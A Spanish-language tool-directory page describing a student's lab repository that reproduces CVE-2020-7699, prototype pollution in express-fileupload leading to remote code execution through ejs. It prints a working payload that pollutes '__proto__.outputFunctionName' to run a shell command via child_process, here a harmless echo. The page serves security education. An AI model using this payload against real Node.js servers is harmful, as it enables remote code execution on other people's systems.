Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-7699_reproduce — Reproducción de CVE-2020-7699, trabajo final de la asignatura Principios de Seguridad de Software. | Kitploit
Herramientas/GitHubGitHub/zodiac12-pub/cve-2020-7699_reproduce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónDesarrollo de PayloadsLabs y Práctica
GitHubzodiac12-pub/cve-2020-7699_reproduce

CVE-2020-7699_reproduce

Reproducción de CVE-2020-7699, trabajo final de la asignatura Principios de Seguridad de Software.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 4 añosAún no revisado

Reproducción de CVE-2020-7699

Reproducción de la vulnerabilidad RCE en Node.js (CVE-2020-7699), mi trabajo de laboratorio

Configuración

Versión de Node.js: v14.16.1, asegúrate de que la versión de Node.js sea 14 (otras versiones probablemente funcionen, no lo probé)

Versión de Python: 3.9.5, Python solo se usa para enviar la solicitud de ataque HTTP, no se requiere una versión específica.

Solo clone el repositorio y ejecuta npm i para instalar las dependencias. También he incluido 2 comandos más:

  • usando npm run start-server para iniciar el servidor objetivo (servidor víctima)
  • usando npm run launch-attack para lanzar el ataque

Análisis

express-fileUpload: las versiones anteriores a la 1.1.10 se ven afectadas

En express-fileUpload existe contaminación de prototipos

Vulnerabilidad: contaminación de prototipos en express-fileUpload

Cómo usarlo: contaminar __proto__.outputFunctionName para escribir el comando a ejecutar. Ej.: echo "ATTACK SUCCESSFUL" > attacked.txt

root@kitploit:~
exec_command = "echo \"ATTACK SUCCESSFUL\" > attacked.txt"

{
    "__proto__.outputFunctionName": (
        None,
        f"x;process.mainModule.require('child_process').exec('{exec_command}');x"
    )
}

En ejs existe RCE

Vulnerabilidad: ejs intentará ejecutar xxx.outputFunctionName, que es undefined, pero si object.outputFunctionName está contaminado, lo ejecutará en su lugar.

Descargar herramienta